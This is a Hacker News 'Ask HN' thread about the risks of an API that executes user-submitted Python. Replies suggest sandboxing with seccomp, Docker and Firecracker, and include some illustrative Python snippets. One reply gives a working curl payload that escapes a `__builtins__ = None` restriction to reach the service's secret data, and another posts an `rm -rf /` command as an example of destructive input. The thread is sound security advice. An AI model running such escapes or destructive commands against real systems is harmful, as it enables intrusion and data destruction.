Ask HN: API to run Python code, what can go wrong?
13 points by nathanganser 10 months ago | 18 comments
As a little weekend project, I'm trying to build an API to run python code and wondering what might go wrong.

Specifically, is there any way of building such a service that is safe from being hacked? My guess is that letting users input code that will be run is never safe, but I'd love some input on this.

The API can be tested here: https://api-run-code.herokuapp.com/ ... and here is the code: https://github.com/nathanganser/api-to-execute-python

For context, I'm thinking about building an app that needs to run user-inputted python code, and since I could not find a service that makes this easy, I just built an MVP of it.

You can use seccomp for this, which might allow you to build something very safe. PyPy also has a similar mechanism built in: https://doc.pypy.org/en/latest/sandbox.html Or you can use virtual machines (you can build or find some that boot in a few milliseconds).

edit: Your specific protection appears to be `__builtins__ = None`, with the code otherwise running in the same interpreter. That is very naive. Here is an example hack that gets to your "secret data":

    $ curl -H Content-Type:application/json -d '{"code": "res = [c for c in ().__class__.__base__.__subclasses__() if c.__name__ == \"catch_warnings\"][0]()._module.__builtins__[\"__import__\"](\"play\").data"}' https://api-run-code.herokuapp.com/execute
(from https://nedbatchelder.com/blog/201206/eval_really_is_dangero... but really you could have googled it)
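
A harmless way to see why this matters is the minimal sketch below. It assumes the protection is roughly `exec` with `__builtins__` set to `None` (the helper names `run_restricted` and `builtin_blocked` are made up for illustration and are not taken from the linked repo). Calling a builtin by name fails, yet plain attribute access still walks from an empty tuple up to `object` and back down to every loaded class, which is the starting point of the exploit above.

```python
def run_restricted(code):
    """Mimic the protection described above: exec with __builtins__ set to None."""
    scope = {"__builtins__": None}
    exec(code, scope)
    return scope.get("res")


def builtin_blocked():
    """Return True if calling a builtin by name fails inside the restricted scope."""
    try:
        run_restricted('res = len("abc")')
    except Exception:
        return True
    return False


# No builtin names are needed here, only attribute access on a literal.
PAYLOAD = "res = [c.__name__ for c in ().__class__.__base__.__subclasses__()]"

reachable = run_restricted(PAYLOAD)

if __name__ == "__main__":
    print("builtins blocked:", builtin_blocked())
    print("classes still reachable:", len(reachable))
```

From that list of classes an attacker only has to find one that holds a reference to a module, as the `catch_warnings` example does.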

Thank you so much for this! That's super helpful!

(Late to the party, but PyCoder's Weekly brought me here)

The method I use for my autograder research platform is:

1) Build a test suite as a JSON string that gets passed to a queue; on the student's side, they're given a job ID, and the page checks the job's status every few seconds

2) When it's their turn, I pass the submission to a Docker image

3) The Docker image dumps the student's code into a "submission.py" file and then dynamically builds the test cases based on what came in the JSON file (using Python's unittest library)

4) Save the code's test results to my DB and mark the job ID as "done"

5) Once the student's AJAX request sees a "done", it also returns the test results as a JSON string, which is then parsed and rendered on the screen
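
The "dynamically builds the test cases" step could look roughly like the sketch below. This is not the commenter's actual code: the JSON layout (`cases`, `function`, `args`, `expected`) and the helper names `build_suite` and `grade` are assumptions made for illustration. It uses `exec` on the submission, so it only makes sense inside the throwaway container.

```python
import json
import types
import unittest


def build_suite(submission_source, spec_json):
    """Build a unittest suite from a JSON spec (hypothetical layout)."""
    spec = json.loads(spec_json)

    # Load the student's code into a fresh module object.
    # Assumption: this runs inside the disposable container, never on the host.
    module = types.ModuleType("submission")
    exec(submission_source, module.__dict__)

    def make_test(case):
        def test(self):
            func = getattr(module, case["function"])
            self.assertEqual(func(*case["args"]), case["expected"])
        return test

    methods = {f"test_{i}": make_test(c) for i, c in enumerate(spec["cases"])}
    case_cls = type("SubmissionTests", (unittest.TestCase,), methods)
    return unittest.defaultTestLoader.loadTestsFromTestCase(case_cls)


def grade(submission_source, spec_json):
    """Run the generated suite and return the results as a JSON string."""
    result = unittest.TestResult()
    build_suite(submission_source, spec_json).run(result)
    return json.dumps({
        "ran": result.testsRun,
        "failures": len(result.failures),
        "errors": len(result.errors),
        "passed": result.wasSuccessful(),
    })


if __name__ == "__main__":
    spec = json.dumps({"cases": [
        {"function": "add", "args": [1, 2], "expected": 3},
        {"function": "add", "args": [2, 2], "expected": 5},
    ]})
    print(grade("def add(a, b):\n    return a + b\n", spec))
```

The returned JSON string is what would be saved to the DB and handed back to the polling request.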

In terms of "safety", the big thing you'll need to test for is that the code inside Docker does not have root access. Try to dig up some Docker vulnerabilities to poke holes in your system. You can also whitelist only a select number of libraries so users don't go importing things with vulnerabilities.
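
One possible way to do the library whitelist is a static check of the submission's import statements before it runs. The sketch below is an assumption about how that could look, not what the platform above does; `ALLOWED_MODULES` and `disallowed_imports` are hypothetical names. A check like this is easy to bypass (the exploit earlier in the thread never writes an `import` statement), so it is a convenience filter on top of the container, not a security boundary.

```python
import ast

# Hypothetical allowlist; pick whatever the exercises actually need.
ALLOWED_MODULES = {"math", "random", "itertools"}


def disallowed_imports(source):
    """Return the sorted top-level modules imported by source that are not allowed."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                found.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom):
            if node.level or not node.module:
                # Relative imports are reported as "." and always rejected.
                found.add(".")
            else:
                found.add(node.module.split(".")[0])
    return sorted(found - ALLOWED_MODULES)


if __name__ == "__main__":
    sample = "import math\nimport os.path\nfrom subprocess import run\n"
    print(disallowed_imports(sample))
```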

Here are some references:

  - Giles Thomas - Lessons Learned from Serving 1/4 million in-browser Python Consoles with Tornado - EuroPython2013
    - Link: https://www.youtube.com/watch?v=U_qp8u_BH_E
    - Description: Giles is from PythonAnywhere, the author of [Interactive shells on Python.org](https://blog.pythonanywhere.com/83/) blog post.

    - PythonAnywhere uses:
      - SockJS:
        - Repo: https://github.com/sockjs
      - pty (Python built-in module) for handling pseudo-terminals (with pty.fork):
        - Docs: https://docs.python.org/3.7/library/pty.html
      - epoll (Tornado's IOLoop.add_handler for async):
        - Docs: https://www.tornadoweb.org/en/stable/

  - Xterm.js: Terminal on the browser at https://xtermjs.org/

  - Jessica McKellar: Building and Breaking a Python Sandbox - Pycon 2014:
    - Link: https://www.youtube.com/watch?v=sL_syMmRkoU
    - pysandbox (author recommends running Python in a sandbox, not the opposite)

  - Interactive Shells on Python.org:
    - Link: https://blog.pythonanywhere.com/83/

  - CodeSandbox: Online web application editor (Angular, React, Vue, Vanilla JS)
    - Website: https://codesandbox.io/
    - Repo: https://github.com/codesandbox/codesandbox-client

  - Kaggle:

    - Description: Kaggle's infrastructure and systems allow for arbitrary code execution and scoring. It would be good to check it out and see what they get right.

    - Kaggle Learntools:
      - Purpose: Check exercises and notebooks submitted by users
      - Link: https://github.com/Kaggle/learntools

    - Kaggle Docker:
      - Purpose: Kaggle Python docker image
      - Link: https://github.com/Kaggle/docker-python/

    - Kaggle Infrastructure (Lessons Learned from Tens of Thousands of Kaggle Notebooks):
      - Link: https://www.youtube.com/watch?v=ENPBTl0uNOE

  - Miscellaneous Links:
    - Jinja has a sandboxed environment:
      - Link: https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py

Replit does this for their own services, and it seems like they might give you access to it, too[1].

That post is old and not very detailed, so maybe I'm misinterpreting it.

1. https://blog.replit.com/api-docs


from the page: "Our old code execution API has been deprecated."

That would be the perfect solution to this, thanks for sharing! Hopefully they'll launch something new soon!

Another thought: "lambda" (FaaS) platforms.

They have already figured out how to isolate functions from harming the host system, and they've solved the issue of potentially infinite execution time.
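
If you roll your own instead, the execution-time part at least is simple to approximate. The sketch below is only an illustration (the function name `run_with_timeout` and the result format are made up): it runs the code in a separate interpreter process and kills it after a deadline. It does not isolate the code from the host's files or network, so it would have to sit inside a container, VM, or similar sandbox.

```python
import subprocess
import sys


def run_with_timeout(code, timeout_s=5.0):
    """Run code in a child interpreter and stop it after timeout_s seconds."""
    try:
        proc = subprocess.run(
            [sys.executable, "-I", "-c", code],  # -I: isolated mode, ignores env vars and user site
            capture_output=True,
            text=True,
            timeout=timeout_s,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child before raising.
        return {"status": "timeout", "stdout": "", "stderr": ""}
    status = "ok" if proc.returncode == 0 else "error"
    return {"status": status, "stdout": proc.stdout, "stderr": proc.stderr}


if __name__ == "__main__":
    print(run_with_timeout("print(1 + 1)"))
    print(run_with_timeout("while True: pass", timeout_s=1.0))
```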

You want to use some sort of sandbox or VM for this. Firecracker might fit your use case: https://firecracker-microvm.github.io/

Thanks for sharing! I'll dig into this! Seems perfect :)

no problem! check out this post: https://fly.io/blog/sandboxing-and-workload-isolation/ (fly.io uses firecracker)

Isn't AWS Lambda like this? I write Python right into the web interface to implement simple services, event handlers, etc.

Not really, the use case for example would be an app like Codecademy:

- users input code

- you need to run the code and provide the output

As an app, you would not send users to AWS Lambda right?

    import os
    os.system("rm -rf / ")

I was trying to read about this, what's the purpose of this?

Sorry you got downvoted. It's a legitimate question. I think the parent comment was being ironic by pointing out a dangerous command that might be run. I think it would remove any files at the root directory.

rm -> remove/delete the given file

-r -> recursively delete files and subdirectories

-f -> remove forcefully without a confirmation prompt, specifically useful when deleting unwritable files

/ -> the root directory, basically the base of the entire filesystem

When combined, it's dangerous because it could delete every file and directory under the root. I'm not sure, but I think you would need superuser (sudo) privileges to do so, but I'm not gonna test it:

sudo rm -rf /

Here's more on rm: https://www.geeksforgeeks.org/rm-rf-command-in-linux-with-ex...

Thanks for taking the time to explain, really appreciate the kindness :)

it will remove every file and directory on your computer without any prompts...

FastAPI probably does everything that you're looking for?
